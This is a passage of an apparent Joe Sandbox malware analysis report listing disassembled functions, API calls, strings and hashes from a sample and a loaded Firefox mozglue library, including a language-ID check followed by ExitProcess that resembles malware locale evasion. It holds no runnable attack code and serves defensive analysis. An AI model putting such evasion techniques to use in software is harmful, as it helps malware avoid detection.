StrCmpCA.SHLWAPI(?,000C08D1), ref: 000B44C0
lstrcat.KERNEL32(00000000,00000000), ref: 000B44D2
lstrcat.KERNEL32(00000000,?), ref: 000B44E5
lstrcat.KERNEL32(00000000,000C0FB8), ref: 000B44F4

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: feda8b063aa38301f546006aa33e9a362977e8a213e06eb56ea5f1b6aff0340f
Instruction ID: 75302e1ea91161912d42e5e4e5719163d33b57f834ee6ec4f35800861bd7b52f
Opcode Fuzzy Hash: feda8b063aa38301f546006aa33e9a362977e8a213e06eb56ea5f1b6aff0340f
Instruction Fuzzy Hash: 2D711776900208A7DB14EBE0DC89FEE7779AB48300F048598F605A7182DA35EB45CB91

Function 6C6BAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C6BAC52
CreateFileMappingW.KERNEL32 ref: 6C6BAC7D
GetSystemInfo.KERNEL32 ref: 6C6BAC98
MapViewOfFile.KERNEL32 ref: 6C6BACB0
GetSystemInfo.KERNEL32 ref: 6C6BACCD
MapViewOfFile.KERNEL32 ref: 6C6BAD05
UnmapViewOfFile.KERNEL32 ref: 6C6BAD1C
CloseHandle.KERNEL32 ref: 6C6BAD28
UnmapViewOfFile.KERNEL32 ref: 6C6BAD37
CloseHandle.KERNEL32 ref: 6C6BAD43
CloseHandle.KERNEL32 ref: 6C6BAD67

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction ID: 1d55252a4fddc2fce995aea856eb7163ac88f37b0f772768b4ec13c3e935887d
Opcode Fuzzy Hash: 59696297686353adecd41f422a9d48b54b654ba51719b09777c39cf6cc7fa849
Instruction Fuzzy Hash: A53190B1A043058FDB00AF7EC68826EBBF0FF85345F014A2DE98597215EB70A559CB86

Function 6C6A9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A8273), ref: 6C6A9D65
free.MOZGLUE(6C6A8273,?), ref: 6C6A9D7C
free.MOZGLUE(?,?), ref: 6C6A9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C6A9E0F
free.MOZGLUE(6C6A946B,?,?), ref: 6C6A9E24
free.MOZGLUE(?,?,?), ref: 6C6A9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C6A9EC8
free.MOZGLUE(6C6A946B,?,?,?), ref: 6C6A9EDF
free.MOZGLUE(?,?,?,?), ref: 6C6A9EF5

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction ID: fa545ec4329949322bd680fc9968324518d816ccd6c396595b76251b73b351ee
Opcode Fuzzy Hash: 67e78d3d9d097ad1ca04e265dc7055d3ed7003f3399f77049d326915d4b2b0a6
Instruction Fuzzy Hash: 2F71DF70909B418BC712CF68C48055BF3F4FF99318B508A5DE84A5BB02EB31E8C6CB99

Function 6C68CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6531A7), ref: 6C68CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C68CFA4, 6C68CFB8
<jemalloc>, xrefs: 6C68CF9F, 6C68CFB3

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction ID: 8d2d31da99423ca1da97be1f51af25de81625c11ea9824aa909d2306d991b280
Opcode Fuzzy Hash: 9f8f935de94653ac65db46b0c6f2766408528d0946ca29d98d5c39011b3dcb21
Instruction Fuzzy Hash: 7131A7307422056BFB10AF668C45BAE7775BF85754F204118F612EB684DB70E501CBBD

Function 6C65ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C65F100: LoadLibraryW.KERNEL32(shell32,?,6C6CD020), ref: 6C65F122
Part of subcall function 6C65F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C65F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C65ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C65EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C65EDCC
CreateFileW.KERNEL32 ref: 6C65EE08
free.MOZGLUE(00000000), ref: 6C65EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C65EE32

Part of subcall function 6C65EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C65EBB5
Part of subcall function 6C65EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C68D7F3), ref: 6C65EBC3
Part of subcall function 6C65EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C68D7F3), ref: 6C65EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C65EDC1

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction ID: 58349f6a09830bb8ba9f10bcb68811798057119605d22f8757a79b57b5dcc24a
Opcode Fuzzy Hash: aff3e682c30c1d894395bd1230d8b7f2f94c1da813581de920205db56cd4430b
Instruction Fuzzy Hash: F251F171E052048BDF00DF69C8806EEB7F0AF4A318F94852DE8956B740E7346959C7EA

Function 6C6CA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA565

Part of subcall function 6C6CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CA4BE
Part of subcall function 6C6CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6CA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6CA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6CA6B6

Strings

z, xrefs: 6C6CA6AE
0, xrefs: 6C6CA5FB

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction ID: 04f669c28a7bbff4618a294ce90f01ccbc11bc35cfc35bd6eeabef394af0ac6b
Opcode Fuzzy Hash: 712dce064de4174f7be760f1de679cf96d388de0a395e03b1cfbcc39e6cfbc89
Instruction Fuzzy Hash: 75414771A097459FC341CF29C080A8BBBE4FF8A344F408A2EF49987651EB30D549CB87

Function 6C699420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
__Init_thread_footer.LIBCMT ref: 6C69949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C69946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C69947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C699459

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction ID: aa2c4d1473f1cb2f1ae45731b97a48eff6bf2a21c92b5f4b9591bb7a0ffbe7d0
Opcode Fuzzy Hash: 1975ebd18fdda91212e2c2a4ae65ce86654b8f1e754ebe6337f32358a6cf2a89
Instruction Fuzzy Hash: C5012830A001028BD7109B5ED840A8D33B99F06B3DF054537DD0AC6B52D623F4648D5F

Function 000B6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 000B6774
ExitProcess.KERNEL32 ref: 000B67A5
ExitProcess.KERNEL32 ref: 000B67AF
ExitProcess.KERNEL32 ref: 000B67B9
ExitProcess.KERNEL32 ref: 000B67C3
ExitProcess.KERNEL32 ref: 000B67CD

Strings

*, xrefs: 000B678C

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 0f748aa4ceff694d75894397f8f6fe34c719627a469dc619b201f3d6f0a98009
Instruction ID: 1928abe98937e10a898cc90dd426f9e5e48560f68035f97fe0d96a5b0b4a2fe6
Opcode Fuzzy Hash: 0f748aa4ceff694d75894397f8f6fe34c719627a469dc619b201f3d6f0a98009
Instruction Fuzzy Hash: 8FF08234988289EFD344DFE1F94D76CBB70FB04703F0401A8F6098A290DA796B41DB96

Function 6C6CB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6CB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6CB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6CB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6CB5F4
__Init_thread_footer.LIBCMT ref: 6C6CB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6CB61F
std::_Facet_Register.LIBCPMT ref: 6C6CB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CB655

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction ID: 70af877dea57f0e7fc2c37128b4d8ba1b432833bcab7c8e056cdc96acfe85fe5
Opcode Fuzzy Hash: 3c1a17819dfe9a350094352700d341752c2ca1ac99d6397397ee31cc8f07406e
Instruction Fuzzy Hash: FB316F71B002058BCB00DFAAC8989AEB7F5EFCA325F150519D90697780DB31B906CF9E

Function 6C6A1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6A1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6A1BE3,?,?,6C6A1D96,00000000), ref: 6C6A1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6A1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6A1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6A1DDA

Part of subcall function 6C6A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6A1F03
Part of subcall function 6C6A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6A1DF2,00000000,00000000), ref: 6C6A1F0C
Part of subcall function 6C6A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6A1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6A1DF4

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction ID: 6237317cd5e8c4c48d03eaf6022813b837f2a5122011ce4a3e1288e701c1984f
Opcode Fuzzy Hash: 4c4b000d06f41878ff19d4314d7ed2d066b6f97361b661544fa9a5f223976c85
Instruction Fuzzy Hash: 434167B52007019FCB10DF69C488A56BBF9FF89314F10442EE95A87B41DB31F855CB99

Function 6C6984E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6984F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985AC

Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C69767F
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C697693
Part of subcall function 6C697670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6976A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6985B2

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction ID: b02f8cc00a9fe643691ff8c2603e189c6edef795f28809ea080049c642b51048
Opcode Fuzzy Hash: 983fe677dbbdfd636f57bc4bf4f18da6e73b00731ded2bd3697c35bd201452d4
Instruction Fuzzy Hash: 7D218E742006029FDB14DF29C888A5AB7B5AF8930CF24492DE55BC3B51EB31F949CB59

Function 6C69F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C664A68), ref: 6C69945E
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C699470
Part of subcall function 6C699420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C699482
Part of subcall function 6C699420: __Init_thread_footer.LIBCMT ref: 6C69949F

GetCurrentThreadId.KERNEL32 ref: 6C69F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C69F561

Part of subcall function 6C6994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6994EE
Part of subcall function 6C6994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C699508

GetCurrentThreadId.KERNEL32 ref: 6C69F577
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F585
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C69F5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C69F56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C69F3A8
[I %d/%d] profiler_resume, xrefs: 6C69F239
[I %d/%d] profiler_resume_sampling, xrefs: 6C69F499

Memory Dump Source

Source File: 00000000.00000002.2269025321.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2269004595.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269088046.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269110628.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2269129071.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

